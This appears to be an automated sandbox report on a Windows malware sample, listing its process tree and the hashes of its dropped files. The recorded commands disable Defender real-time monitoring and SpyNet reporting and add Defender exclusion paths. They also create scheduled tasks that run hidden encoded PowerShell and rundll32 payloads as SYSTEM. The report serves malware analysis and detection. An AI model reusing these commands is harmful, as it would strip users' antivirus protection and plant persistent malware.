C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
PID:384 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:326⤵PID:940
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:646⤵PID:1364
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gRIWOIzFv" /SC once /ST 08:33:16 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="4⤵
- Creates scheduled task(s)
PID:1292
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gRIWOIzFv"4⤵PID:892
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gRIWOIzFv"4⤵PID:1312
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bsXFoBxfaHoLLxRHnd" /SC once /ST 09:07:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\quLMhfgDmsebJteXn\qpzzvTdnDigAAZI\hoCJTtn.exe\" Y9 /site_id 525403 /S" /V1 /F4⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:1636
-
-
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {8B49688E-1DCB-4AF7-BAF4-81DDDB6A7E1B} S-1-5-21-3845472200-3839195424-595303356-1000:ZERMMMDR\Admin:Interactive:[1]1⤵PID:776
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1656 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:1076
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1132 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:584
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:756 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:552
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:540 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:1244
-
-
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:896
-
C:\Windows\system32\taskeng.exetaskeng.exe {5563DFEC-2507-4F53-B2A1-3F604E40EAA8} S-1-5-18:NT AUTHORITY\System:Service:1⤵PID:1532
-
C:\Users\Admin\AppData\Local\Temp\quLMhfgDmsebJteXn\qpzzvTdnDigAAZI\hoCJTtn.exeC:\Users\Admin\AppData\Local\Temp\quLMhfgDmsebJteXn\qpzzvTdnDigAAZI\hoCJTtn.exe Y9 /site_id 525403 /S2⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:1304 -
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gEhnZkAWQ" /SC once /ST 07:41:17 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
PID:1628
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gEhnZkAWQ"3⤵PID:1288
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gEhnZkAWQ"3⤵PID:676
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:323⤵PID:304
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:324⤵
- Modifies Windows Defender Real-time Protection settings
PID:1732
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:643⤵PID:1616
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:644⤵
- Modifies Windows Defender Real-time Protection settings
PID:700
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gyVfBkeBe" /SC once /ST 00:50:03 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
PID:1348
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gyVfBkeBe"3⤵PID:1508
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gyVfBkeBe"3⤵PID:1284
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\KgqoRVUGdWyiycxE" /t REG_DWORD /d 0 /reg:323⤵PID:1548
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\KgqoRVUGdWyiycxE" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:676
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\KgqoRVUGdWyiycxE" /t REG_DWORD /d 0 /reg:643⤵PID:936
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\KgqoRVUGdWyiycxE" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1464
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\KgqoRVUGdWyiycxE" /t REG_DWORD /d 0 /reg:323⤵PID:532
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\KgqoRVUGdWyiycxE" /t REG_DWORD /d 0 /reg:324⤵PID:1608
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\KgqoRVUGdWyiycxE" /t REG_DWORD /d 0 /reg:643⤵PID:1768
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\KgqoRVUGdWyiycxE" /t REG_DWORD /d 0 /reg:644⤵PID:1748
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C copy nul "C:\Windows\Temp\KgqoRVUGdWyiycxE\JULtFFQc\egYUIupdKxbTOmbx.wsf"3⤵PID:1960
-
-
C:\Windows\SysWOW64\wscript.exewscript "C:\Windows\Temp\KgqoRVUGdWyiycxE\JULtFFQc\egYUIupdKxbTOmbx.wsf"3⤵
- Modifies data under HKEY_USERS
PID:752 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\IwGFDhhTU" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1716
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\IwGFDhhTU" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:732
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\MLrIJeslOBZU2" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1300
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\MLrIJeslOBZU2" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1528
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\dMFexHHRtytWC" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1596
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\dMFexHHRtytWC" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1540
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\fIARWfhFKZMqBRuZLOR" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1728
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\fIARWfhFKZMqBRuZLOR" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1084
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\tmuWEvHsDLUn" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1580
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\tmuWEvHsDLUn" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:852
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\LtFzXrdCXcavHaVB" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:924
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\LtFzXrdCXcavHaVB" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1620
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\quLMhfgDmsebJteXn" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:532
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\quLMhfgDmsebJteXn" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1516
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\KgqoRVUGdWyiycxE" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1348
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\KgqoRVUGdWyiycxE" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1692
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\IwGFDhhTU" /t REG_DWORD /d 0 /reg:324⤵PID:1092
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\IwGFDhhTU" /t REG_DWORD /d 0 /reg:644⤵PID:1752
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\MLrIJeslOBZU2" /t REG_DWORD /d 0 /reg:324⤵PID:540
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\MLrIJeslOBZU2" /t REG_DWORD /d 0 /reg:644⤵PID:1528
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\dMFexHHRtytWC" /t REG_DWORD /d 0 /reg:324⤵PID:1952
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\dMFexHHRtytWC" /t REG_DWORD /d 0 /reg:644⤵PID:584
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\fIARWfhFKZMqBRuZLOR" /t REG_DWORD /d 0 /reg:324⤵PID:1284
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\fIARWfhFKZMqBRuZLOR" /t REG_DWORD /d 0 /reg:644⤵PID:1580
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\tmuWEvHsDLUn" /t REG_DWORD /d 0 /reg:324⤵PID:1612
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\tmuWEvHsDLUn" /t REG_DWORD /d 0 /reg:644⤵PID:1464
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\LtFzXrdCXcavHaVB" /t REG_DWORD /d 0 /reg:324⤵PID:316
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\LtFzXrdCXcavHaVB" /t REG_DWORD /d 0 /reg:644⤵PID:1916
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\quLMhfgDmsebJteXn" /t REG_DWORD /d 0 /reg:324⤵PID:1616
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\quLMhfgDmsebJteXn" /t REG_DWORD /d 0 /reg:644⤵PID:1036
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\KgqoRVUGdWyiycxE" /t REG_DWORD /d 0 /reg:324⤵PID:1060
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\KgqoRVUGdWyiycxE" /t REG_DWORD /d 0 /reg:644⤵PID:1692
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "glJkirGZJ" /SC once /ST 04:08:23 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
PID:952
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "glJkirGZJ"3⤵PID:1596
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "glJkirGZJ"3⤵PID:1548
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:323⤵PID:1636
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:324⤵PID:924
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:643⤵PID:1976
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:644⤵PID:304
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "kBFEjYRyDMSuETGat" /SC once /ST 07:24:37 /RU "SYSTEM" /TR "\"C:\Windows\Temp\KgqoRVUGdWyiycxE\JbbjPyWdHhXJkLE\sXodmGM.exe\" vZ /site_id 525403 /S" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:1780
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "kBFEjYRyDMSuETGat"3⤵PID:1520
-
-
-
C:\Windows\Temp\KgqoRVUGdWyiycxE\JbbjPyWdHhXJkLE\sXodmGM.exeC:\Windows\Temp\KgqoRVUGdWyiycxE\JbbjPyWdHhXJkLE\sXodmGM.exe vZ /site_id 525403 /S2⤵
- Checks computer location settings
- Executes dropped EXE
- Drops Chrome extension
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:1796 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bsXFoBxfaHoLLxRHnd"3⤵PID:896
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:323⤵PID:1060
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:324⤵PID:1692
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:643⤵PID:268
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:644⤵PID:1980
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\IwGFDhhTU\ndtGPi.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "gYDAiswqIdfuFBP" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:812 -
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:644⤵PID:1544
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gYDAiswqIdfuFBP2" /F /xml "C:\Program Files (x86)\IwGFDhhTU\EoMluEw.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:1468
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "gYDAiswqIdfuFBP"3⤵PID:1576
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gYDAiswqIdfuFBP"3⤵PID:1156
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "IvZnKcqrFnIXLV" /F /xml "C:\Program Files (x86)\MLrIJeslOBZU2\bhLDgeM.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:676
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "ugEGEGhcUbzrj2" /F /xml "C:\ProgramData\LtFzXrdCXcavHaVB\FvTCWfv.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:616
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "LzUYbeVlHRaHpPMBR2" /F /xml "C:\Program Files (x86)\fIARWfhFKZMqBRuZLOR\SkaLxvg.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:1620
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "MkrfSXeEOJprpwbBHsf2" /F /xml "C:\Program Files (x86)\dMFexHHRtytWC\fFHLiUu.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:1004
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "WMJJJLGkDVEgHktVA" /SC once /ST 08:41:25 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\KgqoRVUGdWyiycxE\ufqHlZim\gnRYpBP.dll\",#1 /site_id 525403" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:652
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "WMJJJLGkDVEgHktVA"3⤵PID:1628
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:323⤵PID:2008
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:324⤵PID:1332
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "kBFEjYRyDMSuETGat"3⤵PID:1932
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:643⤵PID:812
-
-
-
C:\Windows\system32\rundll32.EXEC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\KgqoRVUGdWyiycxE\ufqHlZim\gnRYpBP.dll",#1 /site_id 5254032⤵PID:792
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\KgqoRVUGdWyiycxE\ufqHlZim\gnRYpBP.dll",#1 /site_id 5254033⤵
- Loads dropped DLL
PID:756
-
-
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:976
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:892
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:1724
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD58b0c4b170999f633216f4007c6324727
SHA12375dbf2ed4a86a9cf9f254c1cc589f77d35f9f0
SHA2564325e3cf48470bbfafa0a3b08b129c922dd0f556157513178b246e00bf0aee6f
SHA512e976b50b0ad022d88955b3fe742770f1ce34b325c12e440a266964e3f46d9155913d9e6f55ba08c3336ee7613d2fa5652c32a7a978176a801e28cb98f2561017
-
Filesize
2KB
MD5c8f9a1d92ed1dc958e290104a6567111
SHA1d0ce987d0876741316061ee36a4f763e2e2b7f2d
SHA25663b976bd4c8c00fb42a7309491393f8092b14c311bd929391738f17ae56c6b49
SHA512c89fd653cc4f41f8b236c7554ea3e25fdffb62ae367c3f5856669a9d832c73b329aa4c04d828ff099521fafe169b2e65a45f4fbce6ed2e2df3965d4fc9387f01
-
Filesize
2KB
MD502b17fd1d938ba92581bda9112b3e5ac
SHA148b93c9067bb6920f0849ca7775809c08478310d
SHA2564a63ae105c700caf0d43289d983c1a58e1adf8900aee41bf1e209bce8847d0a3
SHA5121eef63118eab30765a0376b7cd7d1b4c06754e2be9d28963818e7d96179a868a441128d67867adbfed18fbbcd8c78e8660700900c9740bf79ed26f24accec983
-
Filesize
2KB
MD50a19be32db08bccde3a5aeda96f13138
SHA17215315eb3ebd9bfb461760012eef7e6a879941b
SHA25644e737c9a7421bb31f0b646a8f16a2ab43ea0d5250f918da731fd4dcd17af504
SHA5121f7da9dd73086a88ef9700c9aa7366d08f9cb63e0058339a54a63c5414fd0e150d7b4d12d3deed42988745202060219d06a261c8c0bb426a346697f24478b3ff
-
Filesize
2KB
MD5b2a8cd5c6df2a1c890872ee1b15fe064
SHA11d54bc6737db6f852ec9d55a50cc4dc84d3f9bc6
SHA256084da5eace07c5bef00a75d70c512a27cf8a34ddb1303578924b18316924e699
SHA5124e7f48392174b111eff8b70d696daa26a649b68346ed08dc36e5b9002693df2caf352aeebe36dbd8791c83a9ad3a3ea7dc828e4d9821cf3c7ce4c28d171285ca
-
Filesize
6.3MB
MD5282c8329b58a16bbdecc48c1c99ed6f8
SHA1da6eececf075877c32ad343660780ff7baeacb94
SHA2563a6d0e09be92ffc362d022b3602b7a9358706b3bc71863dd6263968fa6a263cc
SHA512c155879dc44352d998702ad6329a1e3893479274f3f09c63cb02d4abf42e23be2d1c9ef393c14bb254077af596d29adfed4753d06b7a4360a8100288a5cac279
-
Filesize
6.3MB
MD5282c8329b58a16bbdecc48c1c99ed6f8
